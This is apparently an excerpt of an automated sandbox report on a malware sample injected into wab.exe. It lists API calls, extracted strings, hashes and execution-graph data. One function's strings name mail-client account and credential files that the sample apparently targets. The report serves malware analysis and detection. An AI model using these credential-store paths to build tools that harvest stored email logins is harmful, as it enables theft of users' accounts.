                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                    • API String ID: 4036392271-1520055953
                    • Opcode ID: b4d5897ed1471f63b6e2c256d28c1e1d4565697b80f22a79ee0af9d205b10860
                    • Instruction ID: d9d81df04abdd4b3698c1adc79bc4ecfb48decce0e4ad2f02d01f2a942273934
                    • Opcode Fuzzy Hash: b4d5897ed1471f63b6e2c256d28c1e1d4565697b80f22a79ee0af9d205b10860
                    • Instruction Fuzzy Hash: BA2195B9E102486AEB1097D4DC81FED733EEF90718F000556F604EB2D8E6B15D81875D
                    Function 21364B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,21364AEA,?,?,21364A8A,?,21372238,0000000C,21364BBD,00000000,00000000), ref: 21364B59
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 21364B6C
                    • FreeLibrary.KERNEL32(00000000,?,?,?,21364AEA,?,?,21364A8A,?,21372238,0000000C,21364BBD,00000000,00000000,?,21362082), ref: 21364B8F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: e7904f7dc910b43ae7327d0ed407de648d8eb8cbdb906023ff37072b81d41e60
                    • Instruction ID: 521b0754a94943091c184bff47d7a92fd060df111a3272b85e7df3156f848c37
                    • Opcode Fuzzy Hash: e7904f7dc910b43ae7327d0ed407de648d8eb8cbdb906023ff37072b81d41e60
                    • Instruction Fuzzy Hash: 33F0C231940188BFDB029F92C808F9EBFBFEF09365F000168F945A3258DB768941CB98
                    Function 21367153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 2136715C
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2136717F
                      • Part of subcall function 213656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21365702
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 213671A5
                    • _free.LIBCMT ref: 213671B8
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 213671C7
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                    • String ID:
                    • API String ID: 336800556-0
                    • Opcode ID: f363ea10d478804f68a0ff62fc8b2e41f92ebd6bb61e2aea349d2cd23c78132c
                    • Instruction ID: ff0157ccc728627a7f32c92c863df6b4aa2710dd18b68aab53ade0789430cb41
                    • Opcode Fuzzy Hash: f363ea10d478804f68a0ff62fc8b2e41f92ebd6bb61e2aea349d2cd23c78132c
                    • Instruction Fuzzy Hash: 41017572605295BF23120FBB5C4CD7B6E6FDAC3AA8350016EFE04C7208DA658C0181B8
                    Function 21365B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000000,2136636D,21365713,00000000,?,21362249,?,?,21361D66,00000000,?,?,00000000), ref: 21365B7F
                    • _free.LIBCMT ref: 21365BB4
                    • _free.LIBCMT ref: 21365BDB
                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21365BE8
                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21365BF1
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    • Opcode ID: bcfcf4643e2c51d83b23c66435423c6943fca72f50bf6c828cd60c9926c1bf92
                    • Instruction ID: daf8647dbec7c50c82b0c2433dbb3d27ef3d5008490e7ec9a463e2f21c66fa5f
                    • Opcode Fuzzy Hash: bcfcf4643e2c51d83b23c66435423c6943fca72f50bf6c828cd60c9926c1bf92
                    • Instruction Fuzzy Hash: E801F4731846C2ABD30316791C88D0B2A6F9BD36FC7200038FB16D715AEE7989024A6C
                    Function 21361E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,?,?,213610DF,?,?,?,00000000), ref: 21361E9A
                    • lstrcatW.KERNEL32(?,?), ref: 21361EAC
                    • lstrlenW.KERNEL32(?,?,213610DF,?,?,?,00000000), ref: 21361EB3
                    • lstrlenW.KERNEL32(?,?,213610DF,?,?,?,00000000), ref: 21361EC8
                    • lstrcatW.KERNEL32(?,213610DF), ref: 21361ED3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$lstrcat
                    • String ID:
                    • API String ID: 493641738-0
                    • Opcode ID: 200aab66f17c319235b6eb610497be9bf09d8d7f950d34d9b2773f1a8b771fbe
                    • Instruction ID: 51f0ab50252c0bc8907bf02892f9484607566df40cefe73545ef6abf6e8a8590
                    • Opcode Fuzzy Hash: 200aab66f17c319235b6eb610497be9bf09d8d7f950d34d9b2773f1a8b771fbe
                    • Instruction Fuzzy Hash: D4F082265402107AE7222B6BAC85EBF7B7DEFC6B64B04001DFA0C83190DB59984293B9
                    Function 213691B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 213691D0
                      • Part of subcall function 2136571E: HeapFree.KERNEL32(00000000,00000000,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?), ref: 21365734
                      • Part of subcall function 2136571E: GetLastError.KERNEL32(?,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?,?), ref: 21365746
                    • _free.LIBCMT ref: 213691E2
                    • _free.LIBCMT ref: 213691F4
                    • _free.LIBCMT ref: 21369206
                    • _free.LIBCMT ref: 21369218
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 8ff8e53b2a2052b980ae40ad978129af0c1def8b688239b53a75e75cc8680e7b
                    • Instruction ID: 1ca55e9da87763e746e160658a5ab7b9f1b7f961a049b3bb551194516ca5f128
                    • Opcode Fuzzy Hash: 8ff8e53b2a2052b980ae40ad978129af0c1def8b688239b53a75e75cc8680e7b
                    • Instruction Fuzzy Hash: A8F0AF725842C9DFC624CF58D5C5C16BFDFEB11368324080DEA08C7808DA38F8808B68
                    Function 21365351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 2136536F
                      • Part of subcall function 2136571E: HeapFree.KERNEL32(00000000,00000000,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?), ref: 21365734
                      • Part of subcall function 2136571E: GetLastError.KERNEL32(?,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?,?), ref: 21365746
                    • _free.LIBCMT ref: 21365381
                    • _free.LIBCMT ref: 21365394
                    • _free.LIBCMT ref: 213653A5
                    • _free.LIBCMT ref: 213653B6
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: beedc5cc822f54a4088d257cbc51ff0235e6596f12e41762370d1e5a62c5c591
                    • Instruction ID: eaf754312bafc6d2ea2eb17eb2e271bd0c7a19f7ed24498e94ded3633d53780d
                    • Opcode Fuzzy Hash: beedc5cc822f54a4088d257cbc51ff0235e6596f12e41762370d1e5a62c5c591
                    • Instruction Fuzzy Hash: 8CF01D72DD4156DBC6135F28998040A3FBFA715BB8305011EE95097658F73D14139F89
                    Function 21364BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 21364C1D
                    • _free.LIBCMT ref: 21364CE8
                    • _free.LIBCMT ref: 21364CF2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: C:\Program Files (x86)\windows mail\wab.exe
                    • API String ID: 2506810119-3377118234
                    • Opcode ID: 2c7b96e90c9c000fbdeddafe3e537728393665b569f5e5bba242e0b3e7800892
                    • Instruction ID: ed438009b61a819ab5cebdb67f2cd0e135109f2d3aae55078aadf7bf209f3ce7
                    • Opcode Fuzzy Hash: 2c7b96e90c9c000fbdeddafe3e537728393665b569f5e5bba242e0b3e7800892
                    • Instruction Fuzzy Hash: BE31B5B1E40299BFDB12CF998880D9EBFFEEB95768F10406AE9049730CD6758A41CB54
                    Function 213686E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,21366FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 21368731
                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 213687BA
                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 213687CC
                    • __freea.LIBCMT ref: 213687D5
                      • Part of subcall function 213656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21365702
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                    • String ID:
                    • API String ID: 2652629310-0
                    • Opcode ID: d211879ef90f655a983a8d236a824f5a3cdbf093d639ff10256ee9225f366e4f
                    • Instruction ID: 2bc4761ff3d37e16b8ccc163d7c0fd970ec32f64c38a5141900064dd25de10b0
                    • Opcode Fuzzy Hash: d211879ef90f655a983a8d236a824f5a3cdbf093d639ff10256ee9225f366e4f
                    • Instruction Fuzzy Hash: AD31B232A0029A9FDF258F65CC84DAF7BAEEB45318F0101B8ED04D7154E739D961CB94
                    Function 21365CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,21361D66,00000000,00000000,?,21365C88,21361D66,00000000,00000000,00000000,?,21365E85,00000006,FlsSetValue), ref: 21365D13
                    • GetLastError.KERNEL32(?,21365C88,21361D66,00000000,00000000,00000000,?,21365E85,00000006,FlsSetValue,2136E190,FlsSetValue,00000000,00000364,?,21365BC8), ref: 21365D1F
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,21365C88,21361D66,00000000,00000000,00000000,?,21365E85,00000006,FlsSetValue,2136E190,FlsSetValue,00000000), ref: 21365D2D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: 79fc23d752f429b826244501ae13096a5452e6c597c3dcfb467a291511a5fd0e
                    • Instruction ID: 190b755acd09205365eaf05dbdf391dda868dc8d6099a416f24a751b1f33745d
                    • Opcode Fuzzy Hash: 79fc23d752f429b826244501ae13096a5452e6c597c3dcfb467a291511a5fd0e
                    • Instruction Fuzzy Hash: 810147332412A6ABC3124E2A8C4CE467B9EAF126E57100630FB0AD7185D725C802CBE8
                    Function 213663F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 2136655C
                      • Part of subcall function 213662BC: IsProcessorFeaturePresent.KERNEL32(00000017,213662AB,00000000,?,?,?,?,00000016,?,?,213662B8,00000000,00000000,00000000,00000000,00000000), ref: 213662BE
                      • Part of subcall function 213662BC: GetCurrentProcess.KERNEL32(C0000417), ref: 213662E0
                      • Part of subcall function 213662BC: TerminateProcess.KERNEL32(00000000), ref: 213662E7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                    • String ID: *?$.
                    • API String ID: 2667617558-3972193922
                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                    • Instruction ID: dd489772a172a961f82f9db88979815ca614086ac153363b87cc09cd62de8f99
                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                    • Instruction Fuzzy Hash: A551D6B1E0024ADFDB05CFA8C880AADBBFEEF49358F24416DD554E7308E6359A01CB94
                    Function 213616AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: : $Se.
                    • API String ID: 4218353326-4089948878
                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                    • Instruction ID: 653d8e09926cd89c282baf39ed8e39dcbc32be720bdcbaca3a4acc81ae00a528
                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                    • Instruction Fuzzy Hash: B811E3B1D00289AECB11CFACD840BDEFBFDAF1A318F10405AE645E7216E6745B02C769
                    Function 21361EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 21362903
                      • Part of subcall function 213635D2: RaiseException.KERNEL32(?,?,?,21362925,00000000,00000000,00000000,?,?,?,?,?,21362925,?,213721B8), ref: 21363632
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 21362920
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: Exception@8Throw$ExceptionRaise
                    • String ID: Unknown exception
                    • API String ID: 3476068407-410509341
                    • Opcode ID: 7d7b8b4e841d3b56fb9afb1aa3dccce4d1e6d389bab3222acf07301f9ffa8ea9
                    • Instruction ID: b747834f801db2728e19205b0e9d92decc39da0aabd1a4f3620294383d01fa24
                    • Opcode Fuzzy Hash: 7d7b8b4e841d3b56fb9afb1aa3dccce4d1e6d389bab3222acf07301f9ffa8ea9
                    • Instruction Fuzzy Hash: 14F02D3490024DBB8B00A6A9EC44D5D3B6F7F1135CB514134FA249249CEF31E926C5DC
                    Function 213669F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                    • GetOEMCP.KERNEL32(00000000,?,?,21366C7C,?), ref: 21366A1E
                    • GetACP.KERNEL32(00000000,?,?,21366C7C,?), ref: 21366A35
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: |l6!
                    • API String ID: 0-2215998295
                    • Opcode ID: eec3e325bedc8e759db5b460ae880d3125a1f31e107e7bd486d8a3e54a2f9f1d
                    • Instruction ID: cdf3fb6d92fa66f4164418287fab6001de92dd584c98384266e9175533aabae6
                    • Opcode Fuzzy Hash: eec3e325bedc8e759db5b460ae880d3125a1f31e107e7bd486d8a3e54a2f9f1d
                    • Instruction Fuzzy Hash: 68F0C2B0480189CFE702CF69C84876D377EFB013B9F544348E4788A1D9EB75494ACB89

                    Execution Graph

                    Execution Coverage:6.3%
                    Dynamic/Decrypted Code Coverage:9.2%
                    Signature Coverage:1.5%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:80
                    execution_graph 40409 441819 40412 430737 40409->40412 40411 441825 40413 430756 40412->40413 40425 43076d 40412->40425 40414 430774 40413->40414 40415 43075f 40413->40415 40427 43034a memcpy 40414->40427 40426 4169a7 11 API calls 40415->40426 40418 4307ce 40419 430819 memset 40418->40419 40428 415b2c 11 API calls 40418->40428 40419->40425 40420 43077e 40420->40418 40423 4307fa 40420->40423 40420->40425 40422 4307e9 40422->40419 40422->40425 40429 4169a7 11 API calls 40423->40429 40425->40411 40426->40425 40427->40420 40428->40422 40429->40425 37671 442ec6 19 API calls 37848 4152c6 malloc 37849 4152e2 37848->37849 37850 4152ef 37848->37850 37852 416760 11 API calls 37850->37852 37852->37849 37853 4466f4 37872 446904 37853->37872 37855 446700 GetModuleHandleA 37858 446710 __set_app_type __p__fmode __p__commode 37855->37858 37857 4467a4 37859 4467ac __setusermatherr 37857->37859 37860 4467b8 37857->37860 37858->37857 37859->37860 37873 4468f0 _controlfp 37860->37873 37862 4467bd _initterm __wgetmainargs _initterm 37864 44681e GetStartupInfoW 37862->37864 37865 446810 37862->37865 37866 446866 GetModuleHandleA 37864->37866 37874 41276d 37866->37874 37870 446896 exit 37871 44689d _cexit 37870->37871 37871->37865 37872->37855 37873->37862 37875 41277d 37874->37875 37917 4044a4 LoadLibraryW 37875->37917 37877 412785 37909 412789 37877->37909 37925 414b81 37877->37925 37880 4127c8 37931 412465 memset ??2@YAPAXI 37880->37931 37882 4127ea 37943 40ac21 37882->37943 37887 412813 37961 40dd07 memset 37887->37961 37888 412827 37966 40db69 memset 37888->37966 37891 412822 37987 4125b6 ??3@YAXPAX 37891->37987 37893 40ada2 _wcsicmp 37894 41283d 37893->37894 37894->37891 37897 412863 CoInitialize 37894->37897 37971 41268e 37894->37971 37991 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37897->37991 37901 41296f 37993 40b633 37901->37993 37904 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37908 412957 37904->37908 37914 4128ca 37904->37914 37908->37891 37909->37870 37909->37871 37910 4128d0 TranslateAcceleratorW 37911 412941 GetMessageW 37910->37911 37910->37914 37911->37908 37911->37910 37912 412909 IsDialogMessageW 37912->37911 37912->37914 37913 4128fd IsDialogMessageW 37913->37911 37913->37912 37914->37910 37914->37912 37914->37913 37915 41292b TranslateMessage DispatchMessageW 37914->37915 37916 41291f IsDialogMessageW 37914->37916 37915->37911 37916->37911 37916->37915 37918 4044cf GetProcAddress 37917->37918 37921 4044f7 37917->37921 37919 4044e8 FreeLibrary 37918->37919 37922 4044df 37918->37922 37920 4044f3 37919->37920 37919->37921 37920->37921 37923 404507 MessageBoxW 37921->37923 37924 40451e 37921->37924 37922->37919 37923->37877 37924->37877 37926 414b8a 37925->37926 37927 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37925->37927 37997 40a804 memset 37926->37997 37927->37880 37930 414b9e GetProcAddress 37930->37927 37932 4124e0 37931->37932 37933 412505 ??2@YAPAXI 37932->37933 37934 41251c 37933->37934 37936 412521 37933->37936 38019 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37934->38019 38008 444722 37936->38008 37942 41259b wcscpy 37942->37882 38024 40b1ab ??3@YAXPAX ??3@YAXPAX 37943->38024 37947 40ad4b 37956 40ad76 37947->37956 38048 40a9ce 37947->38048 37948 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37950 40ac5c 37948->37950 37950->37947 37950->37948 37951 40ace7 ??3@YAXPAX 37950->37951 37950->37956 38028 40a8d0 37950->38028 38040 4099f4 37950->38040 37951->37950 37955 40a8d0 7 API calls 37955->37956 38025 40aa04 37956->38025 37957 40ada2 37958 40adc9 37957->37958 37959 40adaa 37957->37959 37958->37887 37958->37888 37959->37958 37960 40adb3 _wcsicmp 37959->37960 37960->37958 37960->37959 38053 40dce0 37961->38053 37963 40dd3a GetModuleHandleW 38058 40dba7 37963->38058 37967 40dce0 3 API calls 37966->37967 37968 40db99 37967->37968 38130 40dae1 37968->38130 38144 402f3a 37971->38144 37973 412766 37973->37891 37973->37897 37974 4126d3 _wcsicmp 37975 4126a8 37974->37975 37975->37973 37975->37974 37977 41270a 37975->37977 38178 4125f8 7 API calls 37975->38178 37977->37973 38147 411ac5 37977->38147 37988 4125da 37987->37988 37989 4125f0 37988->37989 37990 4125e6 DeleteObject 37988->37990 37992 40b1ab ??3@YAXPAX ??3@YAXPAX 37989->37992 37990->37989 37991->37904 37992->37901 37994 40b640 37993->37994 37995 40b639 ??3@YAXPAX 37993->37995 37996 40b1ab ??3@YAXPAX ??3@YAXPAX 37994->37996 37995->37994 37996->37909 37998 40a83b GetSystemDirectoryW 37997->37998 37999 40a84c wcscpy 37997->37999 37998->37999 38004 409719 wcslen 37999->38004 38002 40a881 LoadLibraryW 38003 40a886 38002->38003 38003->37927 38003->37930 38005 409724 38004->38005 38006 409739 wcscat LoadLibraryW 38004->38006 38005->38006 38007 40972c wcscat 38005->38007 38006->38002 38006->38003 38007->38006 38009 444732 38008->38009 38010 444728 DeleteObject 38008->38010 38020 409cc3 38009->38020 38010->38009 38012 412551 38013 4010f9 38012->38013 38014 401130 38013->38014 38015 401134 GetModuleHandleW LoadIconW 38014->38015 38016 401107 wcsncat 38014->38016 38017 40a7be 38015->38017 38016->38014 38018 40a7d2 38017->38018 38018->37942 38018->38018 38019->37936 38023 409bfd memset wcscpy 38020->38023 38022 409cdb CreateFontIndirectW 38022->38012 38023->38022 38024->37950 38026 40aa14 38025->38026 38027 40aa0a ??3@YAXPAX 38025->38027 38026->37957 38027->38026 38029 40a8eb 38028->38029 38030 40a8df wcslen 38028->38030 38031 40a906 ??3@YAXPAX 38029->38031 38032 40a90f 38029->38032 38030->38029 38033 40a919 38031->38033 38034 4099f4 3 API calls 38032->38034 38035 40a932 38033->38035 38036 40a929 ??3@YAXPAX 38033->38036 38034->38033 38038 4099f4 3 API calls 38035->38038 38037 40a93e memcpy 38036->38037 38037->37950 38039 40a93d 38038->38039 38039->38037 38041 409a41 38040->38041 38042 4099fb malloc 38040->38042 38041->37950 38044 409a37 38042->38044 38045 409a1c 38042->38045 38044->37950 38046 409a30 ??3@YAXPAX 38045->38046 38047 409a20 memcpy 38045->38047 38046->38044 38047->38046 38049 40a9e7 38048->38049 38050 40a9dc ??3@YAXPAX 38048->38050 38052 4099f4 3 API calls 38049->38052 38051 40a9f2 38050->38051 38051->37955 38052->38051 38077 409bca GetModuleFileNameW 38053->38077 38055 40dce6 wcsrchr 38056 40dcf5 38055->38056 38057 40dcf9 wcscat 38055->38057 38056->38057 38057->37963 38078 44db70 38058->38078 38062 40dbfd 38081 4447d9 38062->38081 38065 40dc34 wcscpy wcscpy 38107 40d6f5 38065->38107 38066 40dc1f wcscpy 38066->38065 38069 40d6f5 3 API calls 38070 40dc73 38069->38070 38071 40d6f5 3 API calls 38070->38071 38072 40dc89 38071->38072 38073 40d6f5 3 API calls 38072->38073 38074 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38073->38074 38113 40da80 38074->38113 38077->38055 38079 40dbb4 memset memset 38078->38079 38080 409bca GetModuleFileNameW 38079->38080 38080->38062 38083 4447f4 38081->38083 38082 40dc1b 38082->38065 38082->38066 38083->38082 38084 444807 ??2@YAPAXI 38083->38084 38085 44481f 38084->38085 38086 444873 _snwprintf 38085->38086 38087 4448ab wcscpy 38085->38087 38120 44474a 8 API calls 38086->38120 38089 4448bb 38087->38089 38121 44474a 8 API calls 38089->38121 38090 4448a7 38090->38087 38090->38089 38092 4448cd 38122 44474a 8 API calls 38092->38122 38094 4448e2 38123 44474a 8 API calls 38094->38123 38096 4448f7 38124 44474a 8 API calls 38096->38124 38098 44490c 38125 44474a 8 API calls 38098->38125 38100 444921 38126 44474a 8 API calls 38100->38126 38102 444936 38127 44474a 8 API calls 38102->38127 38104 44494b 38128 44474a 8 API calls 38104->38128 38106 444960 ??3@YAXPAX 38106->38082 38108 44db70 38107->38108 38109 40d702 memset GetPrivateProfileStringW 38108->38109 38110 40d752 38109->38110 